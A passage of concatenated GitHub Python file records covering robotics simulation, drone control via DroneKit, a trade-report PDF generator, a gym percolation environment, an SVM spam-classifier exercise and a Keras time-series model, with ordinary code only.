notifications\nSES_IDENTITY_ARN: str = getenv(\n \"SES_IDENTITY_ARN\", config(\"SES_IDENTITY_ARN\", default=None)\n)\n","repo_name":"gbourniq/django-on-aws","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"54"} +{"seq_id":"721018230","text":"import os\n\nfrom compas.data import json_load\nfrom compas.robots import RobotModel, ToolModel\nfrom compas_fab.robots import Tool, CollisionMesh\n\nfrom pybullet_planning import LockRenderer, set_camera, wait_if_gui\nfrom npp.load import load_pybullet_with_robot, add_tool_to_client\n\n# Load Pybullet Client\nurdf_filename = os.path.join('robot', 'abb_crb15000_support', 'urdf', 'crb15000_5_95.urdf')\nsrdf_filename = os.path.join('robot', 'abb_crb15000_support', 'srdf', 'abb_crb15000_5_95.srdf')\nclient, robot, robot_uid = load_pybullet_with_robot(urdf_filename, srdf_filename, viewer=True)\n\n# Load Tool Model from json, create Tool, add it to Robot\ntool_json_path = os.path.join('tool', 'BioPrint901', 'BioPrint901.json')\ntool_model = json_load(tool_json_path) #type: ToolModel\ntool = Tool.from_tool_model(tool_model)\ntool.link_name = 'tool0'\ntouch_links = ['tool0', 'flange', 'link_6']\nrobot.attach_tool(tool,touch_links=touch_links)\n\n# Add Tool to Pybullet Client\nurdf_package_path = os.path.join('tool', 'BioPrint901')\nadd_tool_to_client(client, robot, tool, urdf_package_path, touch_links=touch_links)\n\n# Load some Collision Meshes\ncollision_meshes_path = os.path.join('test', 'design', 'CollisionMesh1_PrintBed.json')\ncollision_meshes = json_load(collision_meshes_path)\nfor i, mesh in enumerate(collision_meshes):\n cm = CollisionMesh(mesh, 'static_cm_%i' % i)\n client.add_collision_mesh(cm, {})\n\nwait_if_gui()\npass","repo_name":"yck011522/planning_nonplanar_printing","sub_path":"test/pypullet_load_robot_and_tool.py","file_name":"pypullet_load_robot_and_tool.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24746166882","text":"# (x-2)**2 = 0\r\nfrom tqdm import trange\r\n\r\nepoch = 1000\r\nlr = 0.09\r\nx = 5 # 初始值, 凯明初始化, # 何凯明\r\nlabel = 0\r\n\r\n\r\nfor e in trange(epoch):\r\n\r\n pre = (x - 2) ** 2\r\n loss = (pre - label) ** 2\r\n\r\n delta_x = 2*(pre - label) * (x - 2)\r\n x = x - delta_x * lr\r\n\r\nprint(x)","repo_name":"shouxieai/A-series-of-NLP","sub_path":"NLP_深度学习_基础课程/2_梯度下降/梯度下降.py","file_name":"梯度下降.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"54"} +{"seq_id":"39947407927","text":"import os\nimport sys\nimport csv\nimport datetime as dt\nfrom fpdf import FPDF, YPos, XPos\nfrom decimal import Decimal\n\nstartTime = dt.datetime.now()\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nfileDir = os.path.join(ROOT_DIR, 'data')\n\n\ndef main():\n file_dir = get_path()\n if file_dir != \"\":\n records = get_data(file_dir)\n else:\n records = get_data(fileDir)\n create_pdf(records)\n\n\ndef get_path():\n file_dir = \"\"\n if len(sys.argv) > 1:\n print(\"File path entered\\n\")\n fn = sys.argv[1]\n if os.path.exists(fn):\n file_dir = os.path.dirname(fn)\n print(os.path.basename(fn))\n else:\n print(\"Invalid file path entered\\n--trying with default file path\\n\\n\")\n else:\n print(\"No file path entered\\n--trying with default file path\\n\\n\")\n return file_dir\n\n\ndef get_data(file_dir):\n try:\n with open(os.path.join(file_dir, 'TRADE.csv'), 'r') as file:\n csvreader = csv.reader(file)\n trade_header = next(csvreader)\n trade_records = [row for row in csvreader]\n\n with open(os.path.join(file_dir, 'EX_TRADE.csv'), 'r') as file:\n csvreader = csv.reader(file)\n ex_trade_header = next(csvreader)\n ex_trade_records = [row for row in csvreader]\n\n except FileNotFoundError:\n print(\"CSV files not found at directory: \" + file_dir)\n sys.exit()\n\n return trade_records, ex_trade_records, trade_header, ex_trade_header\n\n\ndef create_pdf(records):\n trade_records = records[0]\n ex_trade_records = records[1]\n\n total_value_of_buys: float = 0\n total_value_of_sells: float = 0\n length_of_longest_comment: int = 0\n longest_comment: str = ''\n first_trade_start_time: dt = ''\n last_trade_start_time: dt = ''\n firms_with_trade_volume: {str: Decimal} = {}\n\n trade_count: int = len(trade_records)\n for row in trade_records:\n if len(row[7]) > length_of_longest_comment:\n length_of_longest_comment = len(row[7])\n longest_comment = row[7]\n if row[0] < first_trade_start_time or first_trade_start_time == '':\n first_trade_start_time = row[0]\n if row[0] > last_trade_start_time or last_trade_start_time == '':\n last_trade_start_time = row[0]\n\n if row[1] == 'B':\n total_value_of_buys += float((row[3])) * float((row[4]))\n if row[2] in firms_with_trade_volume:\n firms_with_trade_volume[row[2]] += Decimal(row[3]) * Decimal(row[4])\n if row[2] not in firms_with_trade_volume:\n firms_with_trade_volume[row[2]] = Decimal(row[3]) * Decimal(row[4])\n elif row[1] == 'S':\n total_value_of_sells += float((row[3])) * float((row[4]))\n if row[2] in firms_with_trade_volume:\n firms_with_trade_volume[row[2]] = + Decimal(row[3]) * Decimal(row[4])\n if row[2] not in firms_with_trade_volume:\n firms_with_trade_volume[row[2]] = Decimal(row[3]) * Decimal(row[4])\n\n ex_trade_count: int = len(ex_trade_records)\n for row in ex_trade_records:\n if row[1] < first_trade_start_time or first_trade_start_time == '':\n first_trade_start_time = row[1]\n if row[1] > last_trade_start_time or last_trade_start_time == '':\n last_trade_start_time = row[1]\n if row[3] in firms_with_trade_volume:\n firms_with_trade_volume[row[3]] = + Decimal(row[4]) * Decimal(row[5])\n if row[3] not in firms_with_trade_volume:\n firms_with_trade_volume[row[3]] = Decimal(row[4]) * Decimal(row[5])\n if row[2] == 'BUY_':\n total_value_of_buys += float((row[4])) * float((row[5]))\n elif row[2] == 'SELL':\n total_value_of_sells += float((row[4])) * float((row[5]))\n\n datetime_format = '%Y-%m-%d %H:%M:%S.%f'\n first_trade_start_time: dt = dt.datetime.strptime(first_trade_start_time, datetime_format)\n last_trade_start_time: dt = dt.datetime.strptime(last_trade_start_time, datetime_format)\n trade_interval = (last_trade_start_time - first_trade_start_time).total_seconds()\n\n firms_with_trade_volume = {k: v for k, v in sorted(firms_with_trade_volume.items(), key=lambda item: item[1])}\n total_number_of_unique_firms = len(firms_with_trade_volume)\n\n pdf = FPDF('P', 'mm', 'A4')\n pdf.add_page()\n pdf.add_font('Mono', '', ROOT_DIR + '/fonts/monospace.medium.ttf')\n pdf.set_font('Mono', '', 20)\n pdf.cell(0, 10, 'Trade Summary', new_x=XPos.CENTER, new_y=YPos.NEXT)\n pdf.set_font('Mono', '', 14)\n pdf.cell(0, 10, 'Number of trades: ' + str(trade_count), new_x=XPos.LEFT, new_y=YPos.NEXT)\n pdf.cell(0, 10, 'Number of ex trades: ' + str(ex_trade_count), new_x=XPos.LEFT, new_y=YPos.NEXT)\n pdf.cell(0, 10, 'Total value of buy trades: ' + str(total_value_of_buys), new_x=XPos.LEFT, new_y=YPos.NEXT)\n pdf.cell(0, 10, 'Total value of sell trades: ' + str(total_value_of_sells), new_x=XPos.LEFT, new_y=YPos.NEXT)\n pdf.cell(0, 10, 'Length of longest comment: ' + str(length_of_longest_comment), new_x=XPos.LEFT, new_y=YPos.NEXT)\n pdf.cell(0, 10, 'Longest comment: ' + longest_comment, new_x=XPos.LEFT, new_y=YPos.NEXT)\n pdf.cell(0, 10, 'Trade interval: ' + str(trade_interval) + ' seconds', new_x=XPos.LMARGIN, new_y=YPos.NEXT)\n pdf.ln(5)\n pdf.set_font('Mono', '', 20)\n pdf.cell(0, 10, 'List of Firms', new_x=XPos.CENTER, new_y=YPos.NEXT)\n pdf.set_font('Mono', '', 14)\n pdf.cell(0, 10, 'Total number of firms: ' + str(total_number_of_unique_firms), new_x=XPos.LEFT, new_y=YPos.NEXT)\n for firm in firms_with_trade_volume:\n pdf.cell(0, 10, str(firm), new_x=XPos.LEFT, new_y=YPos.NEXT)\n pdf.ln(5)\n pdf.set_font('Mono', '', 20)\n pdf.cell(0, 10, 'Firm Summary', new_x=XPos.CENTER, new_y=YPos.NEXT)\n pdf.set_font('Mono', '', 14)\n pdf.cell(0, 10, 'Firm Name : Trade Volume', new_x=XPos.LEFT, new_y=YPos.NEXT)\n pdf.cell(0, 10, '--------------------------------', new_x=XPos.LEFT, new_y=YPos.NEXT)\n for firm in firms_with_trade_volume:\n pdf.cell(0, 10, firm + ': ' + str(firms_with_trade_volume[firm]), new_x=XPos.LEFT, new_y=YPos.NEXT)\n pdf.output('report.pdf')\n\n print(\"Execution Completed\")\n print(\"Execution Time: \" + str((dt.datetime.now() - startTime).total_seconds()) + \" seconds\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sayuru-akash/python-scripting-training","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26198091626","text":"from dronekit import connect, VehicleMode, Command\nfrom pymavlink import mavutil\nimport cv2\nimport cv2\nimport numpy as np\nimport serial\nfrom time import sleep\nimport time\nimport argparse\nimport sys\n# Get argument from terminal\nap = argparse.ArgumentParser()\nap.add_argument(\"-f\", \"--ftdi\", help = \"port to ftdi\")\nap.add_argument(\"-a\", \"--arduino\", help = \"port to arduino\")\nargs = vars(ap.parse_args())\nconnectionString = args[\"ftdi\"]\nCOM = args[\"arduino\"]\n\n\n\n# Connect to the Vehicle\nvehicle = connect(connectionString, wait_ready=True,baud=921600)\n#vehicle = connect('127.0.0.1:14550', wait_ready=True)\n\n# arduino connection\n#COM = 'COM5'# /dev/ttyACM0 (Linux)\nBAUD = 9600\nser = serial.Serial(COM, BAUD, timeout = .1)\nprint('Waiting for device')\nsleep(3)\nprint(ser.name)\n\n\n#variable\nstep = int(input(\"input step: \"))\n\n#fungsi\ndef send_nav_velocity(velocity_x, velocity_y, velocity_z):\n # create the SET_POSITION_TARGET_LOCAL_NED command\n msg = vehicle.message_factory.set_position_target_local_ned_encode(\n 0, # time_boot_ms (not used)\n 0, 0, # target system, target component\n mavutil.mavlink.MAV_FRAME_LOCAL_NED, # frame\n 0b0000111111000111, # type_mask (only speeds enabled)\n 0, 0, 0, # x, y, z positions (not used)\n velocity_x, velocity_y, velocity_z, # x, y, z velocity in m/s\n 0, 0, 0, # x, y, z acceleration (not used)\n 0, 0) # yaw, yaw_rate (not used)\n # send command to vehicle\n vehicle.send_mavlink(msg)\n vehicle.flush()\n #gerakan x itu y di dunia asli dan begitu sebaliknya\n\n\ndef servo(channel, sv):\n # input the message\n msg = vehicle.message_factory.command_long_encode(0, 0, # target system, target component\n mavutil.mavlink.MAV_CMD_DO_SET_SERVO,\n 0, # konfirmasi\n channel, # pin relay pada AUX OUT 3\n sv, # pwm value\n 0, 0, 0, 0, 0) # param 1 ~ 5 ga dipake\n # send command to vehicle\n vehicle.send_mavlink(msg)\n vehicle.flush()\n\ndef parseArduino():\n val = str(ser.readline().decode().strip())#Capture serial output as a decoded string\n valA = val.split(\",\")\n return valA\n #print(valA, end=\"\\r\", flush=True)\n\ndef arm_and_takeoff_with_NED(x,y,x_tujuan,y_tujuan,z_tujuan):\n global step\n vel_x = 0\n vel_y = 0\n vel_z = 0\n print(\"Basic pre-arm checks\")\n print(\"Arming\")\n vehicle.armed = True\n while not vehicle.armed:\n print(\" Menunggu arming...\")\n time.sleep(1)\n if x > x_tujuan + 10:\n vel_x = -0.005\n print(\"kekiri\")\n elif x < x_tujuan - 10:\n vel_x = 0.005\n print(\"kekanan\")\n if y > y_tujuan + 10:\n vel_x = 0.005\n print(\"maju\")\n elif y < y_tujuan - 10:\n vel_x = -0.005\n print(\"mundur\")\n if vehicle.rangefinder.distance < z_tujuan * 0.95:\n vel_z = -0.5\n print(\"ketinggian: \"+vehicle.rangefinder.distance)\n elif vehicle.rangefinder.distance >= z_tujuan * 0.95:\n vel_z = 0\n print(\"sampai ketinggian\")\n if y_tujuan - 10 <= y <= y_tujuan+10 and x_tujuan-10 <= x <= x_tujuan+10:\n print(\"sampe\")\n vel_y = 0\n vel_x=0\n step = step+1\n sleep(5)\n send_nav_velocity(vel_x, vel_y, vel_z)\n\ndef arm_and_takeoff(aTargetAltitude):\n global step\n print(\"Basic pre-arm checks\")\n # Don't let the user try to arm until autopilot is ready\n while not vehicle.is_armable:\n print(\" Tunggu inisiasi...\")\n time.sleep(1)\n\n print(\"Arming\")\n # Copter should arm in GUIDED mode\n vehicle.armed = True\n\n while not vehicle.armed:\n print(\" Menunggu arming...\")\n time.sleep(1)\n\n print(\"Take off!\")\n vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude\n\n # Wait until the vehicle reaches a safe height before processing the goto (otherwise the command\n # after Vehicle.simple_takeoff will execute immediately).\n while True:\n print(\" Altitude: \", vehicle.location.global_relative_frame.alt)\n if vehicle.location.global_relative_frame.alt >= aTargetAltitude * 0.95: # Trigger just below target alt.\n print(\"sampai target altitude\")\n step = 1\n break\n time.sleep(1)\n\ndef moveLidar_sama(x,y,x_tujuan,y_tujuan):\n #tambahin bacaan kamera kodeQR\n global step\n vel_x = 0\n vel_y = 0\n vel_z = 0\n if x > x_tujuan + 10:\n vel_x = -0.005\n print(\"kekiri\")\n elif x < x_tujuan - 10:\n vel_x = 0.005\n print(\"kekanan\")\n if y > y_tujuan + 10:\n vel_x = 0.005\n print(\"maju\")\n elif y < y_tujuan - 10:\n vel_x = -0.005\n print(\"mundur\")\n if y_tujuan - 10 <= y <= y_tujuan+10 and x_tujuan-10 <= x <= x_tujuan+10:\n print(\"sampe\")\n vel_y = 0\n vel_x=0\n step = step+1\n sleep(5)\n\n send_nav_velocity(vel_x, vel_y, vel_z)\n\ndef moveLidar_tinggi(x,y,x_tujuan,y_tujuan,z_tujuan):\n # tambahin bacaan kamera kodeQR\n global step\n vel_z = 0\n if vehicle.location.global_relative_frame.alt < z_tujuan+0.02:\n print(\"menaikkan ketinggian\")\n vel_z = 0.01\n else:\n if x > x_tujuan + 10:\n vel_x = -0.005\n print(\"kekiri\")\n elif x < x_tujuan - 10:\n vel_x = 0.005\n print(\"kekanan\")\n if y > y_tujuan + 10:\n vel_x = 0.005\n print(\"maju\")\n elif y < y_tujuan - 10:\n vel_x = -0.005\n print(\"mundur\")\n if y_tujuan - 10 <= y <= y_tujuan + 10 and x_tujuan - 10 <= x <= x_tujuan + 10:\n print(\"sampe\")\n vel_y = 0\n vel_x = 0\n step = step + 1\n sleep(5)\n\n send_nav_velocity(vel_y, vel_x, vel_z)\n\n# def moveLidar_drop1(x,y,x_tujuan,y_tujuan):\n# global step\n# if vehicle.mode.name != 'GUIDED':\n# vehicle.mode = VehicleMode(\"GUIDED\")\n# if x > x_tujuan:\n# vel_x = -0.1\n# if x <= x_tujuan:\n# vel_x = 0\n# x_sampe = 1\n# if y > y_tujuan:\n# vel_y = 0.1\n# if y <= y_tujuan:\n# vel_y = 0\n# y_sampe = 1\n# if x_sampe == 1 & y_sampe == 1:\n# print(\"sampe di lokasi 1\")\n# step = 2\n#\n# send_nav_velocity(vel_x, vel_y, 0)\n#\n# def moveLidar_drop2(x,y,x_tujuan,y_tujuan):\n# global step\n# if vehicle.mode.name != 'GUIDED':\n# vehicle.mode = VehicleMode(\"GUIDED\")\n# if x < x_tujuan:\n# vel_x = 0.2\n# if x >= x_tujuan:\n# vel_x = 0\n# x_sampe = 1\n# if y > y_tujuan:\n# vel_y = 0.1\n# if y <= y_tujuan:\n# vel_y = 0\n# y_sampe = 1\n# if x_sampe == 1 & y_sampe == 1:\n# print(\"sampe di lokasi 2\")\n# step = 3\n# send_nav_velocity(vel_x, vel_y, 0)\n#\n#\n# def moveLidar_home(x,y,x_tujuan,y_tujuan):\n# global step\n# if vehicle.mode.name != 'GUIDED':\n# vehicle.mode = VehicleMode(\"GUIDED\")\n# if x < x_tujuan:\n# vel_x = 0.2\n# if x >= x_tujuan:\n# vel_x = 0\n# x_sampe = 1\n# if y < y_tujuan:\n# vel_y = 0.2\n# if y >= y_tujuan:\n# vel_y = 0\n# y_sampe = 1\n# if x_sampe == 1 & y_sampe == 1:\n# print(\"sampe di home\")\n# step = 4\n# send_nav_velocity(vel_x, vel_y, 0)\n\ndef moveLidar_land(x,y,x_tujuan,y_tujuan):\n global step\n vel_x = 0\n vel_y = 0\n vel_z = 0\n if x > x_tujuan + 10:\n vel_x = -0.005\n print(\"kekiri\")\n elif x < x_tujuan - 10:\n vel_x = 0.005\n print(\"kekanan\")\n if y > y_tujuan + 10:\n vel_x = 0.005\n print(\"maju\")\n elif y < y_tujuan - 10:\n vel_x = -0.005\n print(\"mundur\")\n if y_tujuan - 10 <= y <= y_tujuan+10 and x_tujuan-10 <= x <= x_tujuan+10:\n print(\"sampe tempat land\")\n vel_y = 0\n vel_x=0\n if vehicle.rangefinder.distance > 0.3 * 0.95:\n vel_z = 0.1\n print(\"ketinggian: \" + vehicle.rangefinder.distance)\n elif vehicle.rangefinder.distance <= 0.3 * 0.95:\n vel_z = 0\n print(\"masuk mode land\")\n vehicle.mode=VehicleMode(\"LAND\")\n step = step + 1\n sleep(5)\n send_nav_velocity(vel_x, vel_y, vel_z)\n\n\nwhile True:\n drone_position = parseArduino()\n x = int(drone_position[0])\n y = int(drone_position[1])\n print(x,y)\n if vehicle.mode==VehicleMode(\"GUIDED\"):\n if step == 0:\n arm_and_takeoff_with_NED(x,y,632,273,1) #x,y,alti tujuan takeoff\n elif step == 1:\n print(\"pergi ke lokasi 1\")\n moveLidar_sama(x, y, 408, 238)\n elif step == 2:\n print(\"pergi ke launch\")\n moveLidar_land(x, y, 632, 273)\n else:\n break\n #else:\n #break\n","repo_name":"rasyadmar/moving-drone-with-python","sub_path":"lomba_lidar.py","file_name":"lomba_lidar.py","file_ext":"py","file_size_in_byte":9329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32831550923","text":"import threading\nimport time\n\n\nclass Compte:\n\n def __init__(self):\n self.balance = 100 # Donnée partagée\n \n def maj(self, transaction, montant):\n print(f'{transaction} thread maj...{montant}')\n local_copy = self.balance\n local_copy += montant\n time.sleep(1)\n self.balance = local_copy\n print(f'{transaction} thread fin...')\n\n\nif __name__ == '__main__':\n compte = Compte()\n th = []\n print(f'balance début {compte.balance}')\n for transaction, montant in [('depot', 50), ('retrait', -150)]:\n # t = threading.Thread(target=compte.maj,args=[transaction, montant])\n # t.start()\n # th.append(t)\n compte.maj(transaction, montant)\n # for t in th:\n # t.join()\n print(f'balance de fin {compte.balance}')\n","repo_name":"ISSAE/NFP103","sub_path":"A03/0303-compte.py","file_name":"0303-compte.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25982315900","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\n\nfrom gym_percolation.envs.percolation_grid import PercolationGrid\n\nimport numpy as np\nimport math\n \nclass PercolationEnv(gym.Env): \n metadata = {\n \"render.modes\": [\"human\", \"rgb_array\"],\n }\n \n @property\n def action_space(self):\n actions = list()\n\n '''\n # Very naive heuristic => select available cells\n for i in range(self.grid_view.grid.states.shape[0]):\n for j in range(self.grid_view.grid.states.shape[1]):\n if self.grid_view.grid.states[i,j] == self.grid_view.grid.STATES['Empty']:\n actions.append({'x':i, 'y':j})\n '''\n\n # A little better one => pick cells that has potential to bridge other cells\n cellByClusters = dict() \n for i in range(self.grid_view.grid.states.shape[0]):\n for j in range(self.grid_view.grid.states.shape[1]):\n if self.grid_view.grid.states[i,j] == self.grid_view.grid.STATES['Empty']:\n # Get angle around the cell and look clusters by sorting them\n angleDict = dict()\n for m,n in [(1,0), (1,1), (0,1), (-1,1), (-1,0), (-1, -1), (0, -1), (1, -1)]:\n if 0 <= i+m < self.grid_view.grid_size[0] and 0 <= j+n < self.grid_view.grid_size[1]:\n angle = math.atan2(n, m) \n angleDict[angle] = self.grid_view.grid.states[i+m,j+n]\n\n # Keep coordinates by the number of disjoint clusters\n emptyNum = self.grid_view.grid.STATES['Empty']\n stateVec = [d[1] for d in sorted(angleDict.items(), key=lambda x: x[0])]\n nc = 1 if stateVec[0] != emptyNum else 0\n for c in range(1,len(stateVec)):\n if stateVec[c] != emptyNum and stateVec[c-1] == emptyNum:\n nc += 1\n if len(stateVec) == 8 and stateVec[0] == stateVec[-1] and stateVec[0] != emptyNum:\n nc -= 1\n\n if nc not in cellByClusters:\n cellByClusters[nc] = list()\n cellByClusters[nc].append({'x':i, 'y':j})\n\n # Return the largest ones\n if len(cellByClusters) > 0:\n #maxC = max(list(cellByClusters.keys()))\n #actions = cellByClusters[maxC]\n actions = list()\n for key in cellByClusters.keys():\n if key == 0: continue\n actions.extend(cellByClusters[key])\n else:\n actions = list()\n\n return actions\n\n @property\n def observation_space(self):\n observations = list()\n return observations\n\n def __init__(self, gridObject=None, enable_render=True, np_seed=None):\n\n self.viewer = None\n self.enable_render = enable_render\n\n # Simulation related variables.\n self.seed()\n\n self.grid_view = gridObject\n self.grid_size = self.grid_view.grid_size\n\n # initial condition\n self.state = None\n self.steps_beyond_done = None\n\n # Just need to initialize the relevant attributes\n self.reset()\n self.configure()\n\n def configure(self, display=None):\n self.display = display\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def __del__(self):\n if self.enable_render is True:\n self.grid_view.quit_game()\n \n def is_game_over(self):\n return self.grid_view.game_over\n\n def step(self, action):\n #self.state = self.grid_view.grid.states.copy()\n self.grid_view.grid.register_move(action['x'], action['y'])\n self.state = self.grid_view.grid.states.copy()\n reward = 0\n done = self.is_game_over()\n info = {}\n\n return self.state, reward, done, info\n \n def reset(self, observation=np.array([])):\n self.grid_view.restart()\n self.grid_view.grid.fill_affected()\n if observation.any():\n self.state = observation\n self.grid_view.grid.states = observation\n else:\n self.state = self.grid_view.grid.states # added by Omkar\n #self.state = np.zeros(2) changes made by Omkar\n self.steps_beyond_done = None\n self.done = False\n return self.state\n \n def load(self,state):\n self.grid_view.restart()\n self.grid_view.grid.load(state)\n self.grid_view.grid.fill_affected()\n self.state = self.grid_view.grid.states.copy()\n self.steps_beyond_done = None\n self.done = False\n \n def render(self, mode=\"human\", close=False):\n if close:\n self.grid_view.quit_game()\n\n return self.grid_view.update(mode)\n\n\nclass PercolationEnvMode0(PercolationEnv):\n\n def __init__(self, grid_size=(25, 25), p=0.38, zero_thres=0.05, enable_render=True, np_seed=None):\n pgrid = PercolationGrid(grid_size=grid_size, p=p, zero_thres=zero_thres, np_seed=np_seed, enable_render=enable_render)\n super(PercolationEnvMode0, self).__init__(gridObject=pgrid, enable_render=enable_render, np_seed=np_seed)\n\n","repo_name":"Omkar20895/BLUE","sub_path":"gym-percolation/gym_percolation/envs/percolation_env.py","file_name":"percolation_env.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4564304685","text":"from learning import *\n\n# Load from ex6data1\n# You will have X, y as keys in the dict data\ndata = loadmat(os.path.join('../Data', 'ex6data1.mat'))\nX, y = data['X'], data['y'][:, 0]\n\n# Plot training data\nutils.plotData(X, y)\npyplot.show()\n\n# You should try to change the C value below and see how the decision\n# boundary varies (e.g., try C = 1000)\nC = 1\n\nmodel = utils.svmTrain(X, y, C, utils.linearKernel, 1e-3, 20)\nutils.visualizeBoundaryLinear(X, y, model)\npyplot.show()\n\nx1 = np.array([1, 2, 1])\nx2 = np.array([0, 4, -1])\nsigma = 2\n\nsim = gaussianKernel(x1, x2, sigma)\n\nprint('Gaussian Kernel between x1 = [1, 2, 1], x2 = [0, 4, -1], sigma = %0.2f:'\n '\\n\\t%f\\n(for sigma = 2, this value should be about 0.324652)\\n' % (sigma, sim))\n\n\n# Load from ex6data2\n# You will have X, y as keys in the dict data\ndata = loadmat(os.path.join('../Data', 'ex6data2.mat'))\nX, y = data['X'], data['y'][:, 0]\n\n# Plot training data\nutils.plotData(X, y)\npyplot.show()\n\n# SVM Parameters\nC = 1\nsigma = 0.1\n\nmodel= utils.svmTrain(X, y, C, gaussianKernel, args=(sigma,))\nutils.visualizeBoundary(X, y, model)\npyplot.show()\n\n# Load from ex6data3\n# You will have X, y, Xval, yval as keys in the dict data\ndata = loadmat(os.path.join('../Data', 'ex6data3.mat'))\nX, y, Xval, yval = data['X'], data['y'][:, 0], data['Xval'], data['yval'][:, 0]\n\n# Plot training data\nutils.plotData(X, y)\npyplot.show()\n\n# Try different SVM Parameters here\nC, sigma = dataset3Params(X, y, Xval, yval)\n\n# Train the SVM\n# model = utils.svmTrain(X, y, C, lambda x1, x2: gaussianKernel(x1, x2, sigma))\nmodel = utils.svmTrain(X, y, C, gaussianKernel, args=(sigma,))\nutils.visualizeBoundary(X, y, model)\npyplot.show()\nprint(C, sigma)\n\n\n# to convert each email into a vector of features. In this part, you will\n# implement the preprocessing steps for each email. You should\n# complete the code in processEmail.m to produce a word indices vector\n# for a given email.\n\n# Extract Features\nwith open(os.path.join('../Data', 'emailSample1.txt')) as fid:\n file_contents = fid.read()\n\nword_indices = processEmail(file_contents)\n\n#Print Stats\nprint('-------------')\nprint('Word Indices:')\nprint('-------------')\nprint(word_indices)\n\n\n# Extract Features\nwith open(os.path.join('../Data', 'emailSample1.txt')) as fid:\n file_contents = fid.read()\n\nword_indices = processEmail(file_contents)\nfeatures = emailFeatures(word_indices)\n\n# Print Stats\nprint('\\nLength of feature vector: %d' % len(features))\nprint('Number of non-zero entries: %d' % sum(features > 0))\n\n\n# Load the Spam Email dataset\n# You will have X, y in your environment\ndata = loadmat(os.path.join('../Data', 'spamTrain.mat'))\nX, y= data['X'].astype(float), data['y'][:, 0]\n\nprint('Training Linear SVM (Spam Classification)')\nprint('This may take 1 to 2 minutes ...\\n')\n\nC = 0.1\nmodel = utils.svmTrain(X, y, C, utils.linearKernel)\n\n# Compute the training accuracy\np = utils.svmPredict(model, X)\n\nprint('Training Accuracy: %.2f' % (np.mean(p == y) * 100))\n\n# Load the test dataset\n# You will have Xtest, ytest in your environment\ndata = loadmat(os.path.join('../Data', 'spamTest.mat'))\nXtest, ytest = data['Xtest'].astype(float), data['ytest'][:, 0]\n\nprint('Evaluating the trained Linear SVM on a test set ...')\np = utils.svmPredict(model, Xtest)\n\nprint('Test Accuracy: %.2f' % (np.mean(p == ytest) * 100))\n\n# Sort the weights and obtin the vocabulary list\n# NOTE some words have the same weights, \n# so their order might be different than in the text above\nidx = np.argsort(model['w'])\ntop_idx = idx[-15:][::-1]\nvocabList = utils.getVocabList()\n\nprint('Top predictors of spam:')\nprint('%-15s %-15s' % ('word', 'weight'))\nprint('----' + ' '*12 + '------')\nfor word, w in zip(np.array(vocabList)[top_idx], model['w'][top_idx]):\n print('%-15s %0.2f' % (word, w))\n\nfilename = os.path.join('../Data', 'emailSample1.txt')\n\nwith open(filename) as fid:\n file_contents = fid.read()\n\nword_indices = processEmail(file_contents, verbose=False)\nx = emailFeatures(word_indices)\np = utils.svmPredict(model, x)\n\nprint('\\nProcessed %s\\nSpam Classification: %s' % (filename, 'spam' if p else 'not spam'))\n\n\n","repo_name":"vva2/Ml-projects","sub_path":"spam classifier/vishalvardhan_170108003/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34408606530","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers.convolutional import MaxPooling1D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nos.environ['KERAS_BACKEND'] = 'Tensorflow'\n \ndef subdivide_data_array(data_array, number_of_data_points, number_of_chunks):\n x1 = list()\n x2 = list()\n tst = list()\n end_idx_location = 0\n last_valid_location = number_of_data_points - 1\n for idx in range(number_of_data_points):\n end_idx_location = idx + number_of_chunks\n if end_idx_location > last_valid_location:\n break\n x1.append(data_array[idx:end_idx_location])\n x2.append(data_array[end_idx_location])\n for idx in range(3072,number_of_data_points):\n tst.append(data_array[idx])\n print(' x1.len(): ', len(x1), flush=True)\n print(' x2.len(): ', len(x2), flush=True)\n return np.array(x1), np.array(x2), np.array(tst)\n\ndef construct_model(number_of_chunks, number_of_features):\n model = Sequential()\n model.add(Conv1D(filters=128, kernel_size=3, activation='relu', input_shape=(number_of_chunks, number_of_features)))\n model.add(MaxPooling1D(pool_size=2))\n model.add(Flatten())\n model.add(Dense(64, activation='relu'))\n model.add(Dense(1))\n model.compile(optimizer='Adagrad', loss='mse')\n return model\n\ndef fit_model(model, x1, x2, num_epochs):\n model.fit(x1, x2, epochs=num_epochs, verbose=1)\n return model\n \ndef naive_prediction_from_model(model, test_input, number_of_chunks, number_of_features):\n test_input = test_input.reshape((1, number_of_chunks, number_of_features))\n predicted = model.predict(test_input, verbose=0)\n return predicted\n\ndef generate_model(data_array, number_of_data_points, number_of_chunks, number_of_features, num_epochs):\n predicted = 0\n x1, x2, test_input = subdivide_data_array(data_array, number_of_data_points, number_of_chunks)\n print(' x1.size(): ', np.size(x1), flush=True)\n print(' x2.size(): ', np.size(x2), flush=True)\n x1 = x1.reshape((x1.shape[0], x1.shape[1], number_of_features))\n print(' x1[10].size(): ', np.size(x1[10]), flush=True)\n model = construct_model(number_of_chunks, number_of_features)\n model = fit_model(model, x1, x2, num_epochs)\n return model, test_input\n\ndef plot_data(data_array):\n fig, 